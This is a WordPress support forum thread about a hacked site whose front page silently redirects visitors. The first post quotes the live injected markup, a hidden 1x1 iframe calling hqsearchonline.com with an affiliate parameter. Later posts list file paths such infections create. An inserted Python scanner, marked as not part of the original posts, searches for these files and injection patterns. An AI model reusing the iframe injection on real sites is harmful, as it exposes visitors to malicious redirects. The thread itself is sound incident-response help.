hacked with iFrames, need help finding it (hours spent already) (11 posts)

  1. GuysNation_Rob
    Member
    Posted 2 years ago #

    I'm using the latest version of WordPress, and all my plugins are updated.

    When my site loads, it automatically redirects a user to other sites.

    I viewed the page source from Firefox and it clearly shows that the iframe is the culprit.

    I've used my FTP program (FileZilla) to download the site to my machine and I used the Windows search functionality to look for anywhere that "iframe" text shows up in the files. It found dozens of files, and I looked through each of them, and I can't figure out what's causing the iframe redirect from my main page.

    I was hoping someone would take pity on me and try to help me determine where to look.

    Shown below is the only instance of iframe in the page source for the main page once it's loaded.

    <style type="text/css">
    			.picapp-gallery-wrap {
    				margin:0 auto;
    				text-align:center;
    			}
    			.picapp-gallery-row {
    				clear:both;
    			}
    
    			.picapp-gallery-row:after {
    				clear:both;
    				content:'.';
    				display:block;
    				height:0;
    				visibility:hidden;
    			}
    
    			.picapp-gallery-image {
    				display:block;
    				float:left;
    				margin:5px;
    			}
    		</style>
    
    <script type="text/javascript">var AKPC_IDS = "";</script>
    	<IFRAME style='display:none' NAME='ss' SRC='http://hqsearchonline.com/tds/in.cgi?5&user=mexx' WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
    <style type="text/css" media="print">#wpadminbar { display:none; }</style>

    PLEASE someone help me! I'm driving myself nuts on this, and the site has been down for more than a day.

  2. Digital Raindrops
    Member
    Posted 2 years ago #

    Check out this Google link about hqsearchonline.com; it looks like an injection / infection. Contact your ISP!

    It found dozens of files, and I looked through each of them, and I can't figure out what's causing the iframe redirect from my main page

    The injection could be from your hosting provider, see if they can restore your site to a point before the problem.

    Regards

    David

  3. Anthony
    Member
    Posted 2 years ago #

    Did you follow the instructions at http://codex.wordpress.org/FAQ_My_site_was_hacked

    If you are certain that you have successfully removed all of the malicious code from the files, do a search in PhpMyAdmin for the phrases "iframe" and the URLs used in the iframes.

  4. Anthony
    Member
    Posted 2 years ago #

  5. GuysNation_Rob
    Member
    Posted 2 years ago #

    I'll contact my ISP about the possible injection to see what they can do, but I host four other sites, none of which have much traffic at all (less than 20 total hits per day), and none of them have the iframe redirects... though none of them use WordPress.

    Very familiar with the FAQ_My_site_was_hacked entry at wordpress.org
    - stayed calm
    - scanned my local, it's fine
    - changed my passwords and secret keys
    - have backups
    - read the articles
    - checked my .htaccess
    - upgraded to the latest version of everything

    I'm not certain that I've successfully removed all of the malicious code from the files because I can't find out which files the mal-code is in. I looked through all the instances of "iframe" and I didn't see any spots where it looked like that's what was causing the redirect.

    Do a search in PhpMyAdmin for the phrases "iframe" and the URLs used in the iframes

    Not sure what you mean about PhpMyAdmin, but I downloaded the entire site via FTP to a new location on my machine, then used Windows' search on the entire directory (and subfolders) for "iframe" inside the file. It came up with about 25 files, and I went through each of them one by one, looking for the phrase "iframe", and I looked over what the code was saying and I couldn't determine which one was causing the redirects. In fairness, I'm not a professional developer, and I wasn't able to fully follow all the references which used arrays and such. I will admit that I was looking for a piece of code which was basically just the exact HTML reference, maybe with a variable or two thrown in.

  6. MickeyRoush
    Member
    Posted 2 years ago #

    not sure what you mean about PhpMyAdmin

    Anthony is referring to your database. It's usually accessed through your control panel (cPanel or whatever). Before you do anything with it, make sure you back it up. Then start searching through it. But hopefully that isn't where the infection is. You probably have multiple files spread throughout your whole site. I could be wrong, but it sounds like you have a version of a timthumb attack. If you do, you could have infected files in all three main directories.

    For example:

    Four standard WordPress files that could be infected:
    /wp-config.php
    /wp-settings.php
    /wp-includes/js/l10n.js
    /wp-includes/js/jquery/jquery.js

    The latest hack could also create the following files:
    /wp-admin/common.php
    /wp-admin/upd.php
    /wp-admin/js/config.php
    /wp-content/2b64c2f19d868305aa8bbc2d72902cc5.php (or similar)
    /wp-content/themes/[theme's name]/temp/eab9c5e9815adc4c40a6557495eed6d3.php (or similar)
    /wp-content/upd.php
    /wp-content/data.php

    Possibly also:
    /wp-content/uploads/feed-file.php
    /wp-content/uploads/feed-files.php

    &
    /wp-content/themes/[theme's name]/wp.php
    /wp-content/themes/[theme's name]/sm3.php
    /wp-content/themes/[theme's name]/r1.php
    /wp-content/themes/[theme's name]/2.php
    /wp-content/themes/[theme's name]/cache/.htaccess

    &
    .htaccess (at the root) (redirects are added at the end, after a lot of white space)

    & most recently your theme's header.php file could have been hacked:
    /wp-content/themes/[theme's name]/header.php

    Also look in any cache, temp, and/or tmp files.

    See, there could be files placed anywhere. That's why they say to "Nuke" it from orbit. :)
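
    An added example, not part of the original post: a Python sketch that walks a downloaded copy of the site and flags the file names listed above, 32-hex-character .php names under wp-content, .htaccess rules hidden after a long run of white space, and literal hidden iframe markup like the one in the first post. The 200-character whitespace threshold, the reason labels and the sample tree in `demo()` are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# File names from the list in the post above, relative to the WordPress root.
LISTED = {"wp-admin/common.php", "wp-admin/upd.php", "wp-admin/js/config.php",
          "wp-content/upd.php", "wp-content/data.php",
          "wp-content/uploads/feed-file.php", "wp-content/uploads/feed-files.php"}
THEME_FILES = {"wp.php", "sm3.php", "r1.php", "2.php"}
HASH_PHP = re.compile(r"^[0-9a-f]{32}\.php$")  # 32 hex characters, like the names listed
# Literal iframe markup hidden by style or a 0/1-pixel width; encoded injections will not match.
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*(display\s*:\s*none|width=['\"]?[01]\b)", re.I)
# Assumed threshold: 200+ whitespace characters in a row before a rewrite/redirect rule.
PADDED_RULE = re.compile(r"\s{200,}(Rewrite|Redirect)", re.I)

def scan(root):
    """Return sorted (reason, relative_path) pairs for files to inspect by hand."""
    root, hits = Path(root), set()
    for p in (f for f in root.rglob("*") if f.is_file()):
        rel = p.relative_to(root).as_posix()
        parts = rel.split("/")
        theme = parts[:2] == ["wp-content", "themes"]
        if rel in LISTED:
            hits.add(("listed-file", rel))
        if parts[0] == "wp-content" and HASH_PHP.match(p.name):
            hits.add(("hash-named-php", rel))
        if theme and len(parts) == 4 and p.name in THEME_FILES:
            hits.add(("listed-theme-file", rel))
        if theme and parts[-2:] == ["cache", ".htaccess"]:
            hits.add(("theme-cache-htaccess", rel))
        if p.name == ".htaccess" and PADDED_RULE.search(p.read_text(errors="replace")):
            hits.add(("padded-htaccess-rule", rel))
        elif p.suffix in {".php", ".js"} and HIDDEN_IFRAME.search(p.read_text(errors="replace")):
            hits.add(("hidden-iframe", rel))
    return sorted(hits)

def demo():
    files = {  # constructed sample tree, not taken from a real site
        ".htaccess": "# END WordPress" + "\n" * 300 + "RewriteRule ^ http://example.invalid/ [R,L]\n",
        "wp-content/upd.php": "<?php",
        "wp-content/0123456789abcdef0123456789abcdef.php": "<?php",
        "wp-content/themes/mytheme/header.php":
            "<IFRAME style='display:none' SRC='http://example.invalid/' WIDTH=1></IFRAME>",
        "wp-content/themes/mytheme/footer.php": "<iframe width=560 src='v'></iframe>",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in files.items():
            Path(tmp, rel).parent.mkdir(parents=True, exist_ok=True)
            Path(tmp, rel).write_text(body)
        return scan(tmp)
```

    Run `scan()` on the folder the site was downloaded to; anything it returns is a candidate for manual review, and a clean result does not rule out an injection stored in the database.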

  7. BlogASAP
    Member
    Posted 2 years ago #

    GuysNation_Rob,
    A few days ago, several of my blogs were injected with the same malicious iFrame script (right down to the affiliate link of the user who is behind it). All told, I had about 8 blogs on a single shared hosting account that were affected.

    My first means of resolving the issue was to restore a backup of the databases and website files, change all my passwords and DB usernames, delete all my FTP accounts and watch. Within two days, one of my blogs was redirecting again. I deleted the directory and all subdirectories for that account, then watched. So far, so good.

    Despite the fact that the problem seemed to have been resolved after I took the above steps, I'm not certain that I actually isolated and removed the infected files. In fact, I suspect the server may have been infected. The fact that only one blog was re-infected may have more to do with changes they made to their server after I reported the problem than anything I did to correct it on my end. Just out of curiosity, what hosting company do you use?

  8. Jonas Grumby
    Member
    Posted 2 years ago #

  9. Jonas Grumby
    Member
    Posted 2 years ago #

    BTW as long as you haven't hacked your core WordPress files, you can always upload a fresh copy as long as you keep the settings in wp-config.php. You can also upload fresh copies of your plugins & theme. Always back up your old files just in case, even if they are hacked. Hopefully it's not in your database.

  10. GuysNation_Rob
    Member
    Posted 2 years ago #

    I think I took care of it. I replaced all the core WordPress files after changing all my passwords and I had installed WordPress Firewall.

    I keep getting emails saying that WordPress Firewall blocked an attack on wp-comments-post.php

    Anyone have thoughts on that aspect of it?

  11. BlogASAP
    Member
    Posted 2 years ago #

    What host are you using, Rob?

Topic Closed

This topic has been closed to new replies.
